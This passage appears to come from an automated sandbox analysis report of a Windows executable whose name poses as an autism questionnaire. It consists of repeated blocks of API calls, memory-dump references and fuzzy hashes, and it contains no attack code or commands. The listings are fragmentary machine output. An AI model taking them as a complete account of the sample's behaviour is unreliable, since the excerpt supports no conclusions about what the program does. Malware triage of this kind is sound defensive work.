                                                                                              • GetSystemDefaultUILanguage.KERNEL32(00000000,0040E9D3,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040EA5A,00000000,?,00000105), ref: 0040E98F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DefaultLanguage$SystemUser
                                                                                              • String ID:
                                                                                              • API String ID: 384301227-0
                                                                                              • Opcode ID: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                                                              • Instruction ID: f222509f0094d30d647024d0898a7a2300edb3e6cc60590d57b3240daf1099d8
                                                                                              • Opcode Fuzzy Hash: 71c01383dce129321d42375a4320665508c6a8894fd0ab1ecb023abfc2bbde49
                                                                                              • Instruction Fuzzy Hash: F1312170A002199FDB10EB9AC881BAEB7B5EF44308F50497BE400B73D1D7789D558B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileLibraryLoadModuleName
                                                                                              • String ID:
                                                                                              • API String ID: 1159719554-0
                                                                                              • Opcode ID: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                                              • Instruction ID: bfcf378974dcce41ca09e2914a43810c414f47049a433e9fa093b73340916525
                                                                                              • Opcode Fuzzy Hash: d8f8903bb8f55f7d45334c9080d72fcc7eb242fea3614e091d73e0bd29641f10
                                                                                              • Instruction Fuzzy Hash: 46114270A4021CABDB10EB61DC86BDE73B8EB18304F5145FEA508B72D1DB785E848E99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 005ABB9E
                                                                                              • EnumThreadWindows.USER32(00000000,005ABAFC,00000000), ref: 005ABBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Thread$CurrentEnumWindows
                                                                                              • String ID:
                                                                                              • API String ID: 2396873506-0
                                                                                              • Opcode ID: c23ed00adf58bb8bc199d59d2893d5f3905464b9701e1995fcbbc01dd2e6c622
                                                                                              • Instruction ID: ee6e8008b641080cd7585ababab2aba3c455f5a37fbde39c0718e37cfc8f8a06
                                                                                              • Opcode Fuzzy Hash: c23ed00adf58bb8bc199d59d2893d5f3905464b9701e1995fcbbc01dd2e6c622
                                                                                              • Instruction Fuzzy Hash: C5112574A08744AFD711CF66DCA2D6ABFE9E74A720F1194AAE804D3791E7756C00CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C18F
                                                                                              • GetLastError.KERNEL32(00000000,00000000,0060C1B5,?,?,?), ref: 0060C197
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 2018770650-0
                                                                                              • Opcode ID: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                                                              • Instruction ID: 318e45fb2803f7fcaacad33ae20e8141f5d943eca3b4fb5a26b9ca9ca2c048f0
                                                                                              • Opcode Fuzzy Hash: 3697c3af58fd59330cb1976570848beae36e068bde04d4d9265381b0fddbc49e
                                                                                              • Instruction Fuzzy Hash: 9EF0C831A44308ABCB04DFB59C4149FB7E9DB0932075147FAF804D3382E7745E005994
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RemoveDirectoryW.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C69B
                                                                                              • GetLastError.KERNEL32(00000000,00000000,0060C6C1,?,?,00000000), ref: 0060C6A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryErrorLastRemove
                                                                                              • String ID:
                                                                                              • API String ID: 377330604-0
                                                                                              • Opcode ID: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                                                              • Instruction ID: 4dcda24c2f25390586e6dcbd063c7cff493c698b67123ab594910c5e431ffc76
                                                                                              • Opcode Fuzzy Hash: 53d77f0b7f1706873743be23e773c9934c7890b647961f754ec8971419ba3f02
                                                                                              • Instruction Fuzzy Hash: 86F0C231A94208ABDB14DFB5AC418AFB3E9DB493207514BBAF804E3281EB755E105698
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(00008000), ref: 0042B852
                                                                                              • LoadLibraryW.KERNEL32(00000000,00000000,0042B89C,?,00000000,0042B8BA,?,00008000), ref: 0042B881
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLibraryLoadMode
                                                                                              • String ID:
                                                                                              • API String ID: 2987862817-0
                                                                                              • Opcode ID: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                                                              • Instruction ID: 1e325d9ebe5d0822fb749a998e89c34c252ba1fb5941e6000e67edf6569427d0
                                                                                              • Opcode Fuzzy Hash: 56c95385e7de28241530f81c1942e7ebc726a3a305286d3cd261ddb2ef16c520
                                                                                              • Instruction Fuzzy Hash: D6F08270614704BEDB016FB69C5286FBBECEB4AB0079349B6F814A2691E67D581086A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 005B8297
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: TextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 530164218-0
                                                                                              • Opcode ID: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                                                              • Instruction ID: 06eb74493f32fc7ca45b3b7e2b46e6e7fae3055f649a2dcd14cf2a1bc93d960e
                                                                                              • Opcode Fuzzy Hash: 33779a9760d10673c226e654349b0cc0fe433a542468b9758a9705a4e554b78e
                                                                                              • Instruction Fuzzy Hash: 2AF0A7743015002ADB11AA6A8885BFA678CAF86715F0801BAFE049F387CF785D41C3BA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                                                              • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                                                              • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeKnownPathTask
                                                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                              • API String ID: 969438705-544719455
                                                                                              • Opcode ID: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                                                              • Instruction ID: 8490eda7aae5474be0b02337b94e319d82e09844d8c50d4b14fc66eb57101d9e
                                                                                              • Opcode Fuzzy Hash: 8384953cfd88f85c37ee3bb36c9ff3900296b8c279f57d69efe11ea1f24b55c1
                                                                                              • Instruction Fuzzy Hash: 32E09232744700AEE711ABA5DC62F3A77E9E74DB10B62447AF404E2690D634AD009A28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SHGetKnownFolderPath.SHELL32(006CD814,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4DA
                                                                                              • CoTaskMemFree.OLE32(?,006AC51D,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC510
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FolderFreeKnownPathTask
                                                                                              • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                              • API String ID: 969438705-544719455
                                                                                              • Opcode ID: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                                                              • Instruction ID: c6c261769d38d943bb646f4c75fbe89f1fed75b0b48c3df2323ffd2a5fb60eac
                                                                                              • Opcode Fuzzy Hash: 313031661c9f3d937668f184e05f07051bbe0573f7bc91d8efeaafa51bbcf367
                                                                                              • Instruction Fuzzy Hash: 7DE02230B00300AEEB12AFA8CC02F2A73A9EB09B40F62447AF400D6680D634ED108E38
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(00000000,000000FC), ref: 004786B3
                                                                                              • DestroyWindow.USER32(00000000,00000000,000000FC,?,?,0061559E,006B8C29), ref: 004786BB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$DestroyLong
                                                                                              • String ID:
                                                                                              • API String ID: 2871862000-0
                                                                                              • Opcode ID: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                                                              • Instruction ID: 631b19700b559cadd17185a070b253bcc10ed0a910bd4b2a6cdfdfbedeaeb0c2
                                                                                              • Opcode Fuzzy Hash: 21f9de746b4a3ac2ffe65a062f9f41cf70f012a852ffe98306038f1eec2ec08f
                                                                                              • Instruction Fuzzy Hash: 14C012A12021302A161131796CC98EB00888C823A9329866FF824862D3DF8C0D8102ED
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(006CFADC,00000000,00008000), ref: 00406E0E
                                                                                              • VirtualFree.KERNEL32(006D1B80,00000000,00008000), ref: 00406E8A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 1263568516-0
                                                                                              • Opcode ID: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                                                              • Instruction ID: 8d3276661228be03e62c92a97986ee0a4f38eb12010ad15582d000b3628175ea
                                                                                              • Opcode Fuzzy Hash: ba0a6a8ba3a490a9d7cf8823c3f45091e9916bb0961cb6397077b966313e451f
                                                                                              • Instruction Fuzzy Hash: CA1194716007009FD7648F58D841B26BBE2EB84754F26807FE54EEF381D678AC018BD8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserCallbackDispatcher.NTDLL(00000000,00409BA6,?,006C5000,006D1B9C,?,?,00409FA9,?,?,?,0040A032,0040701B,00407062,?,?), ref: 00409B96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallbackDispatcherUser
                                                                                              • String ID:
                                                                                              • API String ID: 2492992576-0
                                                                                              • Opcode ID: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                                                              • Instruction ID: 984d59f3d031b3db7ed4f0d205521ad444ca36c97295ef9fd1821bff389e3508
                                                                                              • Opcode Fuzzy Hash: f8d181e33e77468429ffc4b921afeeebf03913a5087e96241a90740b508f10d8
                                                                                              • Instruction Fuzzy Hash: 3BF09031B05705AED3314F0AB880E53BBACFB4A770755047BD808A6792E3B9BC00C5A4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,?,?,00443D4C,00469961,00000000,00469A4C,?,?,00443D4C), ref: 00423745
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                                                              • Instruction ID: 502252b8251e75369e7d593655d0488969bd90bcda5cf89e16fadd6ec266699d
                                                                                              • Opcode Fuzzy Hash: 6f16c655491f78fa5763c8526b08530e2a4023042208957ddd042cfe4711d361
                                                                                              • Instruction Fuzzy Hash: AEE0DFE3B401243AF72069AE9C82F7B9159C781776F06023AFB60EB2D1C558EC0086E8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,005CBEAE,00000000,005CBEFF,?,005CC0E0), ref: 005C859B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatMessage
                                                                                              • String ID:
                                                                                              • API String ID: 1306739567-0
                                                                                              • Opcode ID: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                                                              • Instruction ID: 09862238c43e822cbcf5df792bab944b0a9534785c307f7411e32f5bd31f51a0
                                                                                              • Opcode Fuzzy Hash: 388da2a30acd779cb9b4506f5decf73e4625cccda17330470f141bc11173101f
                                                                                              • Instruction Fuzzy Hash: 30E020707543113EF32421950C43FFA1589F7C0B04FE4443D76409D2D5DEF9D8554296
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(00000000,00000000,005C684E,?,00000000,00000000,?,005C689E,00000000,0060C275,00000000,0060C296,?,00000000,00000000,00000000), ref: 005C6831
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp Download File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                                                              • Instruction ID: 7ef4f7d410bb1350c6c34c2cfd3ab79e32246cebd9daa6780dadc2d4ee8c12dd
                                                                                              • Opcode Fuzzy Hash: 85279aa7474272da0a36c77eda8612fc540a8840951a4a65ba93d5f3cd5711a6
                                                                                              • Instruction Fuzzy Hash: 9AE09231344308AFE701EAF6CC52E5DB7EDE749704B924879F400D7682E678AE108458
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                                                                • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                                                • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileModuleName$LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 4113206344-0
                                                                                              • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                                              • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                                                              • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                                              • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNEL32(00000000,?,0060C4A9,00000000,0060C4C2,?,?,00000000), ref: 005C68AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                                                              • Instruction ID: d55d13c6b4de8628cf529bab2b0a17402205638270c5277f1e7dff5d9331f337
                                                                                              • Opcode Fuzzy Hash: fc7bba78512c36340606f51b3448168c2bfd95e472c364ddabcd04349e7824a7
                                                                                              • Instruction Fuzzy Hash: 75D012A034520019DE1455FE19F9F5907C45F85325B140B6EB965D51E2D3298F9B1059
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetErrorMode.KERNEL32(?,0042B8C1), ref: 0042B8B4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorMode
                                                                                              • String ID:
                                                                                              • API String ID: 2340568224-0
                                                                                              • Opcode ID: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                                                              • Instruction ID: 1e160e63f6e1d4a3e736ac7d2d169814141797cfe1ada65cb98a64290c0f9c9c
                                                                                              • Opcode Fuzzy Hash: f668b7aac12c857ffb67314c22418dc82c6b08374c4fda6f72eaba5712bdb9bb
                                                                                              • Instruction Fuzzy Hash: 9CB09B76F0C2005DA709B695745146C67D8EBC47103E148A7F404C2540D57C5444451C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                                                              • Instruction ID: 0a261b708251fa214c00368c1c1d02b101a55c617d2dc256ba4673a2d64f6cb6
                                                                                              • Opcode Fuzzy Hash: d1033aaa8653b6f7709aea60d3a64e5207737459bb20ef6f0850b05c11f2e6ae
                                                                                              • Instruction Fuzzy Hash: 0DC002B0D131009ECF40DF7CDE45B4237E6A704305F081427F905C61A4D6344440EB24
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoSystem
                                                                                              • String ID:
                                                                                              • API String ID: 31276548-0
                                                                                              • Opcode ID: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                                              • Instruction ID: dd27519167a78a1d4504dc33fea54df0b767f1302367e86ea931617165e635a5
                                                                                              • Opcode Fuzzy Hash: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                                              • Instruction Fuzzy Hash: FAA012144089000ACC04F7194C4340B35905D40114FC40668745CA92C3E61985644ADB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D62F8,00000000,00000000,?,00478693,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 0047847A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: fc669b537235a23ae2906f34a93fdf65b951992da1392276f95ab17c119d37c1
                                                                                              • Instruction ID: 21ed9f25b44590dd6a88678dd2699128a8c8abd14296acda62ee9fdc78064473
                                                                                              • Opcode Fuzzy Hash: fc669b537235a23ae2906f34a93fdf65b951992da1392276f95ab17c119d37c1
                                                                                              • Instruction Fuzzy Hash: F6114C746813069BC710DF19C880B86B7E5EB98350F10C53AE96C9F385E7B4E904CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.331497285.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.331489082.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332831825.00000000006C5000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332850943.00000000006C6000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332862702.00000000006C7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.332960770.00000000006CA000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333215301.00000000006CC000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333250852.00000000006CE000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333265905.00000000006CF000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333281133.00000000006D4000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333384414.00000000006D9000.00000008.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333401326.00000000006DB000.00000004.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333457353.00000000006DC000.00000002.00020000.sdmp
                                                                                              • Associated: 00000003.00000002.333525246.00000000006DE000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                                                              • Instruction ID: 671f966e8e8ef53a1d331dc007cdee3d18c8d913abcb1f2bfacacf6af6d793b4
                                                                                              • Opcode Fuzzy Hash: a522bf9bd685f9285ef17df139ca3c83d4d9edda6c804f015ead83d427766566
                                                                                              • Instruction Fuzzy Hash: 9CF0AFF2B003018FD7549FB89D40B12BBD6E708354F20413EE90DEB794D7B088008B88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00405843
                                                                                              • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00405866
